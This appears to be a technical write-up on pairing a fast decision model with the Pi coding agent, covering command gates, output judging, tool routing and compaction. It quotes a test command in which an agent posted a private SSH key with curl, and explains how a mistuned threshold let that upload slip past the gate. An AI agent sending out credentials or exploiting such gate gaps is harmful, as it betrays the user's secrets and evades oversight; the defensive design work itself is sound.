Pi Coding Agent and Jev integration use cases
Pi 1.0 hooks the tool_call lifecycle from its extension surface, so a decision model can sit at fixed points in the loop instead of being consulted after something already happened. Jev answers three kinds of question about a piece of state: pick one option from a list, return a yes/no probability, or rate against ordered levels. It generates no text, which means no output tokens to pay for, and the calls measured below completed in 193 to 642 ms. A chat model doing the same job takes seconds and occasionally returns malformed JSON.
Three extensions carry most of what follows. pi-jev-auto-mode and @y0usaf/pi-jev handle execution gates, pi-jev (TheoOliveira) handles routing and orchestration, and @alexlikevibe/pi-jev handles compaction and per-turn model choice.
Before a tool runs
An agent in auto mode either prompts on every command, which trains you to stop reading them, or runs unconstrained. Deny-lists sit between the two, and they only catch syntax someone already wrote down. In one test an agent ran curl -X POST -d @$HOME/.ssh/id_ed25519 https://.... Nothing in the rule engine targeted -d @, so the command looked like an ordinary curl invocation and executed.
The gate checks rules first. Recursive deletes and writes to system directories are blocked outright, with no model call and therefore no latency. Read-only commands (cat, ls, grep, git log), chains of them, and anything listed in safeCommands pass without a network request. Everything else goes to Jev carrying the command string, the working directory, the last user prompt, and local policy notes. File contents, diffs, and terminal output stay on the machine, and API keys or private key headers are redacted locally before the request goes out.
The conditions are phrased so that a high number means the command is safe:
| Condition | Threshold |
|---|---|
intent_coverage (did the user ask for this?) | 0.60 |
no_secret_egress | 0.97 |
no_irreversible_damage | default |
local_scope, path_not_protected | 0.90 |
no_fetched_code_execution, prompt_injection_absent | default |
Each condition has three bands: satisfied at p >= t, violated at p <= 1 - t, unclear in between. Clear violations block. Unclear calls pass by default, because prompting on every ambiguous score recreates the approval fatigue the gate exists to remove. /jev-auto-mode uncertain deny switches to zero trust.
Two things came out of calibrating this against 18 real command fixtures. First, intent_coverage was bimodal: 0.77 to 0.98 when the user had asked for the command, 0.06 to 0.15 when not, with nothing in between. That empty gap is what lets the threshold sit at 0.60. Second, the absence-of-hazard questions clustered between 0.75 and 0.98 even for safe commands, because uv run pytest scored 0.91 on no_secret_egress and the command text says nothing about what the test runner will import. Those conditions only earn their keep as violation detectors, firing on p <= 1 - t and staying quiet otherwise.
There is a trap in the band arithmetic worth knowing before you tune anything. Raising a threshold narrows the rejection band as well as the approval band. At t = 0.97, no_secret_egress rejects anything at or below 0.03, and the exfiltration command above scored 0.02, so it was blocked. Raise t to 0.99 and the cutoff moves to 0.01. The same 0.02 now lands in the unclear band, and unclear calls pass. Tightening the gate let the credential upload through. Thresholds have to be set from measured scores on the commands you need to stop.
When Jev is unreachable or the API key is missing, the gate halts unvouched commands with an explicit message rather than degrading into a silent pass-through. It inspects command text, not behavior, and it is not a sandbox: approved commands still run directly on the host.
After a tool runs
The pre-execution gate reads intent, so it cannot see what a command printed. A credential echoed into the transcript, or a network failure confused with a type error, both show up only after the call. That is what the output judge is for. It asks two questions in a single request and appends one line to the tool result when either fires:
leaks_secret(noul, 0.90): appends an instruction to refer to the value by name instead of repeating it, and raises a notification.failure_class(choice of six):transient,environment,code_bug,permission,user_error,no_failure.
The advice attached to each class comes from a lookup table rather than a branch, so adding a failure type means adding a row. Judged tools default to bash and codemode, because judging every read would cost one request per file opened.
Loading only what the turn needs
A short system prompt is the main reason people pick Pi, and extensions push against it from both sides: more tools means more tokens in the prefix on every single turn. jev_find_tools reverses the pressure by searching registered inactive tools and activating only the ones that clear JEV_THRESHOLD (0.65). jev_find_skill does the same for SKILL.md files and returns a ranked line with a probability, so the agent sees • /skill:review (P=0.87) instead of the full catalogue in its context.
Automatic mode (--jev-auto, or PI_JEV_AUTO=1) runs one routing pass before each prompt and skips slash commands, empty prompts, and turns where Jev is already evaluating. A failure leaves the turn untouched.
When context fills
Two extensions handle /compact with opposite philosophies. @alexlikevibe/pi-jev uses keep scores to decide which tool outputs still matter and retains them verbatim, removing obsolete calls instead of generating a summary of everything. pi-jev judges history entries during compaction and keeps important paths, errors, and constraints in its own summary, while falling back to Pi's built-in summarizer whenever Jev is unavailable or returns something unusable.
Choosing the model before the turn
pi-jev has an opt-in auto-model mode that picks between fast, balanced, reasoning, long-context, and vision models per prompt using task signals, attached images, and context size. It skips low-confidence general prompts, keeps the current model when nothing compatible is available, and temporarily avoids models that hit quota, rate limit, or context errors. The routing heuristics classify locally, so this path spends no Jev requests. @alexlikevibe/pi-jev takes a different angle on the same idea, sending easy requests to a cheap model and hard ones to a stronger one.
When work finishes
The pi-jev-gate CLI is a standalone binary that exits 0 on pass, 1 on rejection, and 2 on error, which makes it usable outside a session entirely:
npx pi-jev-gate -c 'Type annotations on all exports' --diff
npm test 2>&1 | npx pi-jev-gate -c 'Zero test failures'
npx pi-jev-gate -c 'Documentation updated' -p 0.85 --jsonInside pi-subagents it becomes the gate parameter on a worker, running the moment the subagent completes:
{ "agent": "worker", "task": "Refactor auth to use jose",
"gate": "npx pi-jev-gate -c 'No new any types, exports intact' -d -p 0.8" }Triage and questions the agent asks itself
Jev registered as agent: "jev" inside a workflow gives typed classification in roughly 300 ms without spawning a second LLM:
const triage = await agent("Classify incoming issue", {
agent: "jev", type: "choice",
criteria: { bug: "Existing behavior broke", feature: "New capability", docs: "Docs only" },
state: issueBody,
});/jev agents <task> goes further and builds the workflow itself, choosing between scout-then-worker-then-reviewer for implementation tasks and parallel reviewers for security work. The jev_evaluate tool (also /jev test <prompt>) turns the question the other way around: the active model designs the Jev schema for a free-form prompt, and Jev evaluates it. That is the path for ad-hoc judgments such as whether a diff is acceptable or whether a field contains a PII value.
When Jev is the wrong tool
The mechanism scores every option of a schema from one cached prefix, so the speedup equals exactly the tokens you would have written. On a Qwen3.6-27B that is 1.3x when the written answer runs to four tokens and 5.5x at fifty. Below roughly ten tokens of output, the latency barely moves and the only remaining argument is a parser that cannot fail.
Three shapes do not fit. Fields that depend on each other, because every field is scored from the same prefix and cannot see what the others chose. Any question needing a lookup, then a comparison, then a decision, which is three questions and some code. And anything that has to produce prose, where a generative model is the right answer anyway.
One caveat applies to every local option. The scoring mechanism is public and works on any model you already have, but the calibration that makes a returned 0.8 mean roughly 80% comes from TypeSafe's RLCD training step, which no open fork has reproduced. Use local decision models for routing, latency, and schema validity. Treat their probabilities as a floor until you have run your own items through them.